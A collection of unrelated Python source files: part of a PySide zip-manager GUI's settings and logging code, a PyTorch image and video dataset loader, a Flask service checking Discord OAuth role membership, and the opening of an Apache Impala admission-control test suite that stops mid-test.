with open(tempDir.name.replace('\\', '/')+'/log.txt', "a+", errors="ignore") as log:
try:
if(debugging or "WARN" in str(dataToLog[0]) or "FAILED" in str(dataToLog[0])):
print(dataToLog[0])
log.write(dataToLog[0]+"\n")
except Exception as e:
log.write(f"!--- An error occurred while saving line, missing log line ---! ({e})\n")
del dataToLog[0]
except NotADirectoryError:
pass
else:
time.sleep(0.01)
def openLog() -> None:
log("[ ] Opening log...")
openOnExplorer(tempDir.name.replace('\\', '/')+'/log.txt', force=True)
def openOnExplorer(file: str, force: bool = True) -> None:
if (_platform == 'win32'):
try:
subprocess.run('start explorer /select,"{0}"'.format(file.replace("/", "\\")), shell=True)
except:
log("[ WARN ] Unable to show file {0} on file explorer.".format(file))
elif (_platform == 'darwin'):
if(force):
try:
os.system('open "'+file+'"')
except:
log("[ WARN ] Unable to show file {0} on finder.".format(file))
else:
try:
os.system("open "+("/".join(str(file).split("/")[:-1])))
except:
log("[ WARN ] Unable to show file {0} on finder.".format(file))
elif (_platform == 'linux' or _platform == 'linux2'):
try:
Thread(target=os.system, args=("xdg-open "+file,), daemon=True).start()
except:
log("[ WARN ] Unable to show file {0} on default file explorer.".format(file))
class CheckModeThread(QtCore.QThread):
refreshTheme = QtCore.Signal()
shouldBeRunning = True
def __init__(self):
super().__init__()
self.setTerminationEnabled(True)
def run(self) -> None:
log("[ INFO ] New theme check thread spawned")
lastModeWasLight = darkdetect.isLight()
while self.shouldBeRunning:
if(lastModeWasLight!=darkdetect.isLight()):
log("[ OK ] Theme changed, emitting signal...")
self.refreshTheme.emit()
lastModeWasLight = darkdetect.isLight()
time.sleep(0.01)
def saveSettings(silent=True, default_algorithm="Deflated", default_level=5, create_subdir=True, mode="auto", plainAppearance=None, autoCheckForUpdates=True) -> bool:
if plainAppearance == None:
plainAppearance = settings["plainAppearance"]
global defaultSettings
try:
os.chdir(os.path.expanduser('~'))
try:
os.chdir('.SomePythonThings')
except FileNotFoundError:
log("[ WARN ] Can't acces .SomePythonThings folder, creating .SomePythonThings...")
os.mkdir(".SomePythonThings")
os.chdir('.SomePythonThings')
try:
os.chdir('Zip Manager')
except FileNotFoundError:
log("[ WARN ] Can't acces Zip Manager folder, creating Zip Manager...")
os.mkdir("Zip Manager")
os.chdir('Zip Manager')
try:
settingsFile = open('settings.conf', 'w')
settingsFile.write(str({
"default_algorithm": default_algorithm,
"default_level":default_level,
"create_subdir":create_subdir,
"mode":mode,
"autoCheckForUpdates": autoCheckForUpdates,
"plainAppearance": plainAppearance,
}))
settingsFile.close()
log("[ OK ] Settings saved successfully")
return True
except Exception as e:
log('[ ] Creating new settings.conf')
saveSettings()
if(debugging):
raise e
return False
except Exception as e:
log("[ FAILED ] Unable to save settings")
if(debugging):
raise e
return False
def openSettings() -> dict:
global defaultSettings
os.chdir(os.path.expanduser('~'))
try:
os.chdir('.SomePythonThings')
try:
os.chdir('Zip Manager')
try:
settingsFile = open('settings.conf', 'r')
settings = json.loads("\""+str(settingsFile.read().replace('\n', '').replace('\n\r', ''))+"\"")
settingsFile.close()
log('[ ] Loaded settings are: '+str(settings))
return literal_eval(settings)
except Exception as e:
log('[ ] Creating new settings.conf')
saveSettings()
if(debugging):
raise e
return defaultSettings
except FileNotFoundError:
log("[ WARN ] Can't acces Zip Manager folder, creating settings...")
saveSettings()
return defaultSettings
except FileNotFoundError:
log("[ WARN ] Can't acces .SomePythonThings folder, creating settings...")
saveSettings()
return defaultSettings
try:
readSettings = openSettings()
i = 0
for key in readSettings.keys():
settings[key] = readSettings[key]
i +=1
log("[ OK ] Settings loaded (settings={0})".format(str(settings)))
except Exception as e:
log("[ FAILED ] Unable to read settings! ({0})".format(str(e)))
def winIsLight() -> bool:
mode = darkdetect.isLight()
if(mode!=None):
return mode
else:
return True
def openSettingsWindow(parent):
global settings
settingsWindow = QtWidgets.QMainWindow(parent)
settingsWindow.setFixedSize(400, 350)
settingsWindow.setWindowTitle("SomePythonThings Zip Manager Settings")
settingsWindow.setWindowFlag(QtCore.Qt.WindowMinimizeButtonHint, False)
settingsWindow.setWindowModality(QtCore.Qt.ApplicationModal)
if(_platform == 'darwin'):
settingsWindow.setAutoFillBackground(True)
settingsWindow.setWindowModality(QtCore.Qt.WindowModal)
settingsWindow.setSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
settingsWindow.setWindowFlag(QtCore.Qt.WindowContextHelpButtonHint, False)
settingsWindow.setWindowFlag(QtCore.Qt.WindowCloseButtonHint, False)
layout = QtWidgets.QVBoxLayout()
settingsWindow.setCentralWidget(QtWidgets.QWidget())
settingsWindow.centralWidget().setLayout(layout)
themeSettings = QtWidgets.QGroupBox()
if(_platform=="darwin"):themeSettings.setFixedWidth(345)
themeSettings.setTitle("General")
l = QtWidgets.QFormLayout()
themeSettings.setLayout(l)
modeSelector = QtWidgets.QComboBox()
plainAppearance = CheckBoxAction()
plainAppearance.setChecked(settings["plainAppearance"])
plainAppearance.setText("")
autoUpdate = CheckBoxAction()
autoUpdate.setChecked(settings["autoCheckForUpdates"])
autoUpdate.setText("")
modeSelector.insertItem(0, 'Light')
modeSelector.insertItem(1, 'Dark')
modeSelector.insertItem(2, 'Auto')
l.addRow("Check for updates at startup: ", autoUpdate)
l.addRow("Follow system appearance: ", plainAppearance)
l.addRow("Application theme: ", modeSelector)
layout.addWidget(themeSettings)
compressionSettings = QtWidgets.QGroupBox()
if(_platform=="darwin"):compressionSettings.setFixedWidth(345)
compressionSettings.setTitle("Compression Settings")
l = QtWidgets.QFormLayout()
compressionSettings.setLayout(l)
algorithmSelector = QtWidgets.QComboBox()
algorithmSelector.insertItem(0, 'Deflated')
algorithmSelector.insertItem(1, 'BZIP2')
algorithmSelector.insertItem(2, 'LZMA')
algorithmSelector.insertItem(3, 'Without compression')
l.addRow("Default compression algorithm: ", algorithmSelector)
levelSelector = QtWidgets.QComboBox()
for i in range(1, 10):
levelSelector.insertItem(i, str(i))
levelSelector.setCurrentIndex(settings["default_level"]-1)
l.addRow("Default compression level: ", levelSelector)
layout.addWidget(compressionSettings)
extractionSettings = QtWidgets.QGroupBox()
if(_platform=="darwin"):extractionSettings.setFixedWidth(345)
extractionSettings.setTitle("Extraction Settings")
l = QtWidgets.QFormLayout()
extractionSettings.setLayout(l)
create_subfolder = CheckBoxAction()
create_subfolder.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
create_subfolder.setChecked(settings["create_subdir"])
create_subfolder.setText("Enable/Disable")
l.addRow("Extract files on new folder: ", create_subfolder)
layout.addWidget(extractionSettings)
layout.addStretch()
saveButton = QtWidgets.QPushButton()
saveButton.setText("Save settings and close")
saveButton.clicked.connect(lambda: saveAndCloseSettings(modeSelector, plainAppearance, algorithmSelector, settingsWindow, levelSelector, create_subfolder, parent, autoUpdate))
layout.addWidget(saveButton)
try:
if(settings['mode'].lower() == 'light'):
modeSelector.setCurrentIndex(0)
elif(settings['mode'].lower() == 'auto'):
modeSelector.setCurrentIndex(2)
elif(settings['mode'].lower() == 'dark'):
modeSelector.setCurrentIndex(1)
else:
log("[ WARN ] Could not detect mode!")
except KeyError:
log("[ WARN ] Could not detect mode!")
try:
if(settings['default_algorithm'] == "Deflated"): #the "== False" is here to avoid eval of invalid values and crash of the program
algorithmSelector.setCurrentIndex(0)
elif(settings['default_algorithm'] == "BZIP2"):
algorithmSelector.setCurrentIndex(1)
elif(settings['default_algorithm'] == "LZMA"):
algorithmSelector.setCurrentIndex(2)
elif(settings['default_algorithm'] == "Without Compression"):
algorithmSelector.setCurrentIndex(3)
else:
log("[ WARN ] Could not set default algorithm!")
except KeyError:
log("[ WARN ] Could not set default algorithm!")
settingsWindow.show()
def saveAndCloseSettings(modeSelector: QtWidgets.QComboBox, plainAppearance: QtWidgets.QCheckBox, algorithmSelector: QtWidgets.QComboBox, settingsWindow, levelSelector: QtWidgets.QComboBox, create_subfolder: QtWidgets.QCheckBox, parent, autoUpdate: QtWidgets.QCheckBox):
global settings, forceClose
if(algorithmSelector.currentIndex() == 0):
settings['default_algorithm'] = "Deflated"
elif(algorithmSelector.currentIndex() == 1):
settings['default_algorithm'] = "BZIP2"
elif(algorithmSelector.currentIndex() == 2):
settings['default_algorithm'] = "LZMA"
else:
settings['default_algorithm'] = "Without Compression"
settings["create_subdir"] = create_subfolder.isChecked()
if(modeSelector.currentIndex() == 0):
settings['mode'] = 'light'
elif(modeSelector.currentIndex() == 1):
settings['mode'] = 'dark'
else:
settings['mode'] = 'auto'
settings["plainAppearance"] = plainAppearance.isChecked()
settings["autoCheckForUpdates"] = autoUpdate.isChecked()
parent.loadStyleSheet()
settings["default_level"] = levelSelector.currentIndex()+1
forceClose = True
settingsWindow.close()
saveSettings(silent=True, create_subdir=settings['create_subdir'], default_level=settings['default_level'], default_algorithm=settings['default_algorithm'], mode=settings['mode'], autoCheckForUpdates=settings["autoCheckForUpdates"])
def openHelp() -> None:
webbrowser.open_new("https://github.com/martinet101/SomePythonThings-Zip-Manager/wiki")
def getExtension(file) -> str:
if(file.split('.')==1):
return 'none'
else:
return (file.split('.'))[-1]
def getFileIcon(file) -> QtGui.QIcon:
ext = getExtension(file).lower()
if(ext[-1]=="/"):
return QtGui.QIcon(getPath("folder.ico"))
icon = QtGui.QIcon(QtWidgets.QFileIconProvider().icon(QtCore.QFileInfo(file)).pixmap(48, 48).scaledToHeight(24, QtCore.Qt.SmoothTransformation))
if not(QtGui.QIcon.isNull(icon)):
return icon
def showWindow(window: QtWidgets.QMainWindow) -> None:
window.show()
window.raise_()
window.activateWindow()
if not(window.isMaximized() or window.isFullScreen()):
window.showNormal()
def notify(title: str, text: str, window: QtWidgets.QMainWindow = None) -> None:
if(window):
app.trayIcon.messageClicked.connect(lambda: showWindow(window))
app.trayIcon.activated.connect(lambda: showWindow(window))
try:
app.trayIcon.showMessage(title, text)
except AttributeError:
log(f"[ FAILED ] Unable to show notification!!!\n\tTitle: {title}\n\t Body: {text} ")
def throwInfo(*args) -> None:
app.w.throwInfo(*args)
def throwWarning(*args) -> None:
app.w.throwInfo(*args)
def throwError(*args) -> None:
app.w.throwInfo(*args)
def confirm(*args) -> QtWidgets.QAbstractButton:
return app.w.throwInfo(*args)
class CheckBoxAction(QtWidgets.QWidget):
def __init__(self, parent=None, text: str = "", checked: bool = False):
super().__init__(parent=parent)
self.setLayout(QtWidgets.QHBoxLayout(self))
if not(settings["plainAppearance"]):
if(settings["mode"] == "dark"):
isLight = False
elif(settings["mode"] == "light"):
isLight = True
else:
isLight = winIsLight()
if(isLight):
self.setStyleSheet(f"""
QCheckBox::indicator {{width: 12px;height: 12px;}}
QCheckBox::indicator:checked{{background-color: #058fff;border-radius: 3px;image: url({getPath("checkCheckedBlack.png")});}}
QCheckBox::indicator:indeterminate{{background-color: #058fff;border-radius: 3px;image: url({getPath("checkUnknowndBlack.png")});}}
QCheckBox::indicator:unchecked{{background-color: transparent;border-radius: 3px;image: url({getPath("checkUncheckedBlack.png")});}}""")
else:
self.setStyleSheet(f"""
QCheckBox::indicator {{width: 12px;height: 12px;}}
QCheckBox::indicator:checked{{background-color: #058fff;border-radius: 3px;image: url({getPath("checkCheckedWhite.png")});}}
QCheckBox::indicator:indeterminate{{background-color: #058fff;border-radius: 3px;image: url({getPath("checkUnknowndWhite.png")});}}
QCheckBox::indicator:unchecked{{background-color: transparent;border-radius: 3px;image: url({getPath("checkUncheckedWhite.png")});}}""")
self.label = QtWidgets.QLabel(text)
self.layout().addWidget(self.label)
self.layout().setMargin(1)
self.check = QtWidgets.QCheckBox(self)
self.layout().addWidget(self.check)
self.check.setChecked(checked)
self.check.stateChanged.connect(self.changeText)
self.changeText()
def setText(self, text: str) -> None:
self.label.setText(text)
def setEnabled(self, enabled: bool) -> None:
self.check.setEnabled(enabled)
self.changeText()
def isChecked(self) -> bool:
return self.check.isChecked()
def changeText(self) -> None:
if(self.check.isChecked()):
self.check.setText("Enabled")
else:
self.check.setText("Disabled")
def setChecked(self, value: bool) -> None:
return self.check.setChecked(value)
def setTristate(self, value: bool) -> None:
return self.check.setTristate(value)
if(__name__ == "__main__"):
import __init__
|
datasets.py
|
# Copyright 2020 Lorna Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import glob
import os
import random
import time
from threading import Thread
import cv2
import numpy as np
from PIL import Image
from torch.utils.data import Dataset
class ImageDataset(Dataset):
def __init__(self, root, transform=None, unaligned=False, mode="train"):
self.transform = transform
self.unaligned = unaligned
self.files_A = sorted(glob.glob(os.path.join(root, f"{mode}/A") + "/*.*"))
self.files_B = sorted(glob.glob(os.path.join(root, f"{mode}/B") + "/*.*"))
def __getitem__(self, index):
item_A = self.transform(Image.open(self.files_A[index % len(self.files_A)]))
if self.unaligned:
item_B = self.transform(Image.open(self.files_B[random.randint(0, len(self.files_B) - 1)]))
else:
item_B = self.transform(Image.open(self.files_B[index % len(self.files_B)]))
return {"A": item_A, "B": item_B}
def __len__(self):
return max(len(self.files_A), len(self.files_B))
class VideoDataset:
""" For reading camera or network data
Load data types from data flow.
Args:
dataroot (str): Data flow file name.
image_size (int): Image size in default data flow. (default:``416``).
"""
def __init__(self, dataroot, image_size=416):
self.mode = "images"
self.image_size = image_size
sources = [dataroot]
n = len(sources)
self.images = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f"{i + 1}/{n}: {s}... ", end="")
capture = cv2.VideoCapture(0 if s == "0" else s)
assert capture.isOpened(), f"Failed to open {s}"
width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = capture.get(cv2.CAP_PROP_FPS) % 100
_, self.images[i] = capture.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, capture]), daemon=True)
print(f"Success ({width}*{height} at {fps:.2f}FPS).")
thread.start()
print("")
def update(self, index, capture):
# Read next stream frame in a daemon thread
num = 0
while capture.isOpened():
num += 1
# Grabs the next frame from video file or capturing device.
capture.grab()
# read every 4th frame
if num == 4:
_, self.images[index] = capture.retrieve()
num = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
raw_image = self.images.copy()
if cv2.waitKey(1) & 0xFF == ord("q"):
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
image = [x for x in raw_image]
# Stack
image = np.stack(image, 0)
# BGR convert to RGB (batch_size 3 x 416 x 416)
image = image[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
# Return a contiguous array
image = np.ascontiguousarray(image)
return image, raw_image
def __len__(self):
return 0
|
auth.py
|
from settings import Settings
from flask import Flask, request, redirect
import requests
import discord
from discord.utils import get
import threading
import json
class Oauth(object):
clientId = Settings.clientId
clientSecret = Settings.clientSecret
scope = "identify"
redirectUri = Settings.redirectUri
discordApiUrl = "https://discordapp.com/api"
discordLoginUrl = "{}/oauth2/authorize?client_id={}&redirect_uri={}&response_type=code&scope={}".format(discordApiUrl, clientId, redirectUri, scope)
class ServiceResponse(object):
def __init__(self, authorized, critical, response):
self.authorized = authorized
self.critical = critical
self.response = response
def toJson(self):
return json.dumps(self.__dict__)
class DiscordBot(discord.Client):
container = None
isReady = False
async def on_ready(self):
self.isReady = True
print('Logged in as', self.user)
self.loop.create_task(self.container.updateBotStatus())
class AuthApp(Flask):
bot = DiscordBot()
sessionIds = { }
activeSessions = [ ]
nicknames = { }
async def startBot(self):
await self.bot.start(Settings.botToken)
async def updateBotStatus(self):
if self.bot.isReady:
count = len(self.activeSessions)
what = "tester" if count == 1 else "testers"
await self.bot.change_presence(activity = discord.Activity(type = discord.ActivityType.watching, name = "{} {} test".format(count, what)))
def __init__(self, name = None):
self.bot.container = self
self.bot.loop.create_task(self.startBot())
thread = threading.Thread(target = self.bot.loop.run_forever, args = ())
thread.daemon = True
thread.start()
super(AuthApp, self).__init__(name)
app = AuthApp(__name__)
@app.route("/auth", methods = ["get"])
def auth():
if (not app.bot.isReady):
return ServiceResponse(0, 1, "Discord bot not logged in.").toJson()
sessionId = request.args.get("sessionId")[0:256]
if (sessionId == None):
return ServiceResponse(0, 1, "Invalid session ID.").toJson()
resp = app.make_response(redirect(Oauth.discordLoginUrl))
resp.set_cookie("sessionId", value = sessionId)
return resp
@app.route("/", methods = ["get"])
def index():
if (not app.bot.isReady):
return ServiceResponse(0, 1, "Discord bot not logged in.").toJson()
sessionId = request.cookies.get("sessionId")[0:256]
if (sessionId == None):
return ServiceResponse(0, 1, "Invalid session ID.").toJson()
code = request.args.get("code")
if (code == None):
return ServiceResponse(0, 1, "Invalid request.").toJson()
app.sessionIds[sessionId] = code
#print("{} -> {}".format(sessionId, code))
return "You may now close this page."
@app.route("/check", methods = ["get"])
def check():
if (not app.bot.isReady):
return ServiceResponse(0, 1, "Discord bot not logged in.").toJson()
sessionId = request.args.get("sessionId")[0:256]
if (sessionId in app.activeSessions):
return ServiceResponse(1, 0, app.nicknames[sessionId]).toJson()
if (sessionId == None):
return ServiceResponse(0, 0, "Invalid session ID.").toJson()
if (sessionId not in app.sessionIds):
return ServiceResponse(0, 0, "User not logged in.").toJson()
code = app.sessionIds.pop(sessionId)
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"client_id": Oauth.clientId,
"client_secret": Oauth.clientSecret,
"grant_type": "authorization_code",
"code": code,
"redirect_uri": Oauth.redirectUri,
"scope": Oauth.scope
}
response = requests.post(url = "{}/oauth2/token".format(Oauth.discordApiUrl), data = data, headers = headers)
token = response.json()["access_token"]
headers = {
"Authorization": "Bearer {}".format(token)
}
response = requests.get(url = "{}/users/@me".format(Oauth.discordApiUrl), headers = headers)
user = response.json()
member = get(app.bot.get_all_members(), id = int(user["id"]))
if (member == None):
return ServiceResponse(0, 1, "Member not found.").toJson()
if (get(member.roles, name = Settings.roleName) == None):
return ServiceResponse(0, 1, "Member not in role.").toJson()
if (sessionId not in app.activeSessions):
app.activeSessions.append(sessionId)
app.bot.loop.create_task(app.updateBotStatus())
app.nicknames[sessionId] = user["username"]
return ServiceResponse(1, 0, app.nicknames[sessionId]).toJson()
@app.route("/end", methods = ["get"])
def end():
if (not app.bot.isReady):
return ServiceResponse(0, 1, "Discord bot not logged in.").toJson()
sessionId = request.args.get("sessionId")[0:256]
if (sessionId == None or sessionId not in app.activeSessions):
return ServiceResponse(0, 0, "Invalid session ID.").toJson()
app.activeSessions.remove(sessionId)
app.nicknames.remove(sessionId)
app.bot.loop.create_task(app.updateBotStatus())
return ServiceResponse(1, 0, "Goodbye.").toJson()
if __name__ == "__main__":
app.run(debug = False, use_reloader = False, host = "0.0.0.0")
|
test_admission_controller.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Tests admission control
import itertools
import logging
import os
import pytest
import re
import shutil
import sys
import threading
from copy import copy
from time import sleep, time
from beeswaxd.BeeswaxService import QueryState
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.environ import build_flavor_timeout, ImpalaTestClusterProperties
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.resource_pool_config import ResourcePoolConfig
from tests.common.skip import (
SkipIfS3,
SkipIfABFS,
SkipIfADLS,
SkipIfEC,
SkipIfNotHdfsMinicluster,
SkipIfOS)
from tests.common.test_dimensions import (
create_single_exec_option_dimension,
create_uncompressed_text_dimension)
from tests.common.test_vector import ImpalaTestDimension
from tests.hs2.hs2_test_suite import HS2TestSuite, needs_session
from tests.util.web_pages_util import (
get_num_completed_backends,
get_mem_admitted_backends_debug_page)
from tests.verifiers.mem_usage_verifier import MemUsageVerifier
from tests.verifiers.metric_verifier import MetricVerifier
from ImpalaService import ImpalaHiveServer2Service
from TCLIService import TCLIService
LOG = logging.getLogger('admission_test')
# The query used for testing. It is important that this query returns many rows
# while keeping fragments active on all backends. This allows a thread to keep
# the query active and consuming resources by fetching one row at a time. The
# where clause is for debugging purposes; each thread will insert its id so
# that running queries can be correlated with the thread that submitted them.
QUERY = " union all ".join(["select * from functional.alltypesagg where id != {0}"] * 30)
# Same query but with additional unpartitioned non-coordinator fragments.
# The unpartitioned fragments are both interior fragments that consume input
# from a scan fragment and non-interior fragments with a constant UNION.
QUERY_WITH_UNPARTITIONED_FRAGMENTS = """
select *, (select count(distinct int_col) from alltypestiny) subquery1,
(select count(distinct int_col) from alltypes) subquery2,
(select 1234) subquery3
from (""" + QUERY + """) v"""
# The statestore heartbeat and topic update frequency (ms). Set low for testing.
STATESTORE_RPC_FREQUENCY_MS = 100
# Time to sleep (in milliseconds) between issuing queries. When the delay is at least
# the statestore heartbeat frequency, all state should be visible by every impalad by
# the time the next query is submitted. Otherwise the different impalads will see stale
# state for some admission decisions.
SUBMISSION_DELAY_MS = \
[0, STATESTORE_RPC_FREQUENCY_MS / 2, STATESTORE_RPC_FREQUENCY_MS * 3 / 2]
# The number of queries to submit. The test does not support fewer queries than
# MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES to keep some validation logic
# simple.
NUM_QUERIES = [15, 30, 50]
# Whether we will submit queries to all available impalads (in a round-robin fashion)
ROUND_ROBIN_SUBMISSION = [True, False]
# The query pool to use. The impalads should be configured to recognize this
# pool with the parameters below.
POOL_NAME = "default-pool"
# Stress test timeout (seconds). The timeout needs to be significantly higher for
# slow builds like code coverage and ASAN (IMPALA-3790, IMPALA-6241).
STRESS_TIMEOUT = build_flavor_timeout(90, slow_build_timeout=600)
# The number of queries that can execute concurrently in the pool POOL_NAME.
MAX_NUM_CONCURRENT_QUERIES = 5
# The number of queries that can be queued in the pool POOL_NAME
MAX_NUM_QUEUED_QUERIES = 10
# Mem limit (bytes) used in the mem limit test
MEM_TEST_LIMIT = 12 * 1024 * 1024 * 1024
_STATESTORED_ARGS = ("-statestore_heartbeat_frequency_ms={freq_ms} "
"-statestore_priority_update_frequency_ms={freq_ms}").format(
freq_ms=STATESTORE_RPC_FREQUENCY_MS)
# Name of the subscriber metric tracking the admission control update interval.
REQUEST_QUEUE_UPDATE_INTERVAL =\
'statestore-subscriber.topic-impala-request-queue.update-interval'
# Key in the query profile for the query options.
PROFILE_QUERY_OPTIONS_KEY = "Query Options (set by configuration): "
# The different ways that a query thread can end its query.
QUERY_END_BEHAVIORS = ['EOS', 'CLIENT_CANCEL', 'QUERY_TIMEOUT', 'CLIENT_CLOSE']
# The timeout used for the QUERY_TIMEOUT end behaviour
QUERY_END_TIMEOUT_S = 3
# Value used for --admission_control_stale_topic_threshold_ms in tests.
STALE_TOPIC_THRESHOLD_MS = 500
# Regex that matches the first part of the profile info string added when a query is
# queued.
INITIAL_QUEUE_REASON_REGEX = \
"Initial admission queue reason: waited [0-9]* ms, reason: .*"
# The path to resources directory which contains the admission control config files.
RESOURCES_DIR = os.path.join(os.environ['IMPALA_HOME'], "fe", "src", "test", "resources")
def impalad_admission_ctrl_flags(max_requests, max_queued, pool_max_mem,
proc_mem_limit=None, queue_wait_timeout_ms=None,
admission_control_slots=None, executor_groups=None):
extra_flags = ""
if proc_mem_limit is not None:
extra_flags += " -mem_limit={0}".format(proc_mem_limit)
if queue_wait_timeout_ms is not None:
extra_flags += " -queue_wait_timeout_ms={0}".format(queue_wait_timeout_ms)
if admission_control_slots is not None:
extra_flags += " -admission_control_slots={0}".format(admission_control_slots)
if executor_groups is not None:
extra_flags += " -executor_groups={0}".format(executor_groups)
return ("-vmodule admission-controller=3 -default_pool_max_requests {0} "
"-default_pool_max_queued {1} -default_pool_mem_limit {2} {3}".format(
max_requests, max_queued, pool_max_mem, extra_flags))
def impalad_admission_ctrl_config_args(fs_allocation_file, llama_site_file,
additional_args="", make_copy=False):
fs_allocation_path = os.path.join(RESOURCES_DIR, fs_allocation_file)
llama_site_path = os.path.join(RESOURCES_DIR, llama_site_file)
if make_copy:
copy_fs_allocation_path = os.path.join(RESOURCES_DIR, "copy-" + fs_allocation_file)
copy_llama_site_path = os.path.join(RESOURCES_DIR, "copy-" + llama_site_file)
shutil.copy2(fs_allocation_path, copy_fs_allocation_path)
shutil.copy2(llama_site_path, copy_llama_site_path)
fs_allocation_path = copy_fs_allocation_path
llama_site_path = copy_llama_site_path
return ("-vmodule admission-controller=3 -fair_scheduler_allocation_path %s "
"-llama_site_path %s %s" % (fs_allocation_path, llama_site_path,
additional_args))
def log_metrics(log_prefix, metrics):
LOG.info("%sadmitted=%s, queued=%s, dequeued=%s, rejected=%s, "
"released=%s, timed-out=%s", log_prefix, metrics['admitted'], metrics['queued'],
metrics['dequeued'], metrics['rejected'], metrics['released'],
metrics['timed-out'])
def compute_metric_deltas(m2, m1):
"""Returns a dictionary of the differences of metrics in m2 and m1 (m2 - m1)"""
return dict((n, m2.get(n, 0) - m1.get(n, 0)) for n in m2.keys())
def metric_key(pool_name, metric_name):
"""Helper method to construct the admission controller metric keys"""
return "admission-controller.%s.%s" % (metric_name, pool_name)
class TestAdmissionControllerBase(CustomClusterTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestAdmissionControllerBase, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension())
# There's no reason to test this on other file formats/compression codecs right now
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
class TestAdmissionController(TestAdmissionControllerBase, HS2TestSuite):
def __check_pool_rejected(self, client, pool, expected_error_re):
try:
client.set_configuration({'request_pool': pool})
client.execute("select 1")
assert False, "Query should return error"
except ImpalaBeeswaxException as e:
assert re.search(expected_error_re, str(e))
def __check_query_options(self, profile, expected_query_options):
"""Validate that the expected per-pool query options were set on the specified
profile. expected_query_options is a list of "KEY=VALUE" strings, e.g.
["MEM_LIMIT=1", ...]"""
confs = []
for line in profile.split("\n"):
if PROFILE_QUERY_OPTIONS_KEY in line:
rhs = re.split(": ", line)[1]
confs = re.split(",", rhs)
break
expected_set = set([x.lower() for x in expected_query_options])
confs_set = set([x.lower() for x in confs])
assert expected_set.issubset(confs_set)
def __check_hs2_query_opts(self, pool_name, mem_limit=None, expected_options=None):
""" Submits a query via HS2 (optionally with a mem_limit in the confOverlay)
into pool_name and checks that the expected_query_options are set in the
profile."""
execute_statement_req = TCLIService.TExecuteStatementReq()
execute_statement_req.sessionHandle = self.session_handle
execute_statement_req.confOverlay = {'request_pool': pool_name}
if mem_limit is not None: execute_statement_req.confOverlay['mem_limit'] = mem_limit
execute_statement_req.statement = "select 1"
execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req)
HS2TestSuite.check_response(execute_statement_resp)
fetch_results_req = TCLIService.TFetchResultsReq()
fetch_results_req.operationHandle = execute_statement_resp.operationHandle
fetch_results_req.maxRows = 1
fetch_results_resp = self.hs2_client.FetchResults(fetch_results_req)
HS2TestSuite.check_response(fetch_results_resp)
close_operation_req = TCLIService.TCloseOperationReq()
close_operation_req.operationHandle = execute_statement_resp.operationHandle
HS2TestSuite.check_response(self.hs2_client.CloseOperation(close_operation_req))
get_profile_req = ImpalaHiveServer2Service.TGetRuntimeProfileReq()
get_profile_req.operationHandle = execute_statement_resp.operationHandle
get_profile_req.sessionHandle = self.session_handle
get_profile_resp = self.hs2_client.GetRuntimeProfile(get_profile_req)
HS2TestSuite.check_response(get_profile_resp)
self.__check_query_options(get_profile_resp.profile, expected_options)
def _execute_and_collect_profiles(self, queries, timeout_s, config_options={},
allow_query_failure=False):
"""Submit the query statements in 'queries' in parallel to the first impalad in
the cluster. After submission, the results are fetched from the queries in
sequence and their profiles are collected. Wait for up to timeout_s for
each query to finish. If 'allow_query_failure' is True, succeeds if the query
completes successfully or ends up in the EXCEPTION state. Otherwise expects the
queries to complete successfully.
Returns the profile strings."""
client = self.cluster.impalads[0].service.create_beeswax_client()
expected_states = [client.QUERY_STATES['FINISHED']]
if allow_query_failure:
expected_states.append(client.QUERY_STATES['EXCEPTION'])
try:
handles = []
profiles = []
client.set_configuration(config_options)
for query in queries:
handles.append(client.execute_async(query))
for query, handle in zip(queries, handles):
state = self.wait_for_any_state(handle, expected_states, timeout_s)
if state == client.QUERY_STATES['FINISHED']:
self.client.fetch(query, handle)
profiles.append(self.client.get_runtime_profile(handle))
return profiles
finally:
client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="fair-scheduler-test2.xml",
llama_site_file="llama-site-test2.xml"),
default_query_options=[('mem_limit', 200000000)],
statestored_args=_STATESTORED_ARGS)
@needs_session(conf_overlay={'batch_size': '100'})
def test_set_request_pool(self):
"""Tests setting the REQUEST_POOL with the pool placement policy configured
to require a specific pool, and validate that the per-pool configurations were
applied."""
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
# Expected default mem limit for queueA, used in several tests below
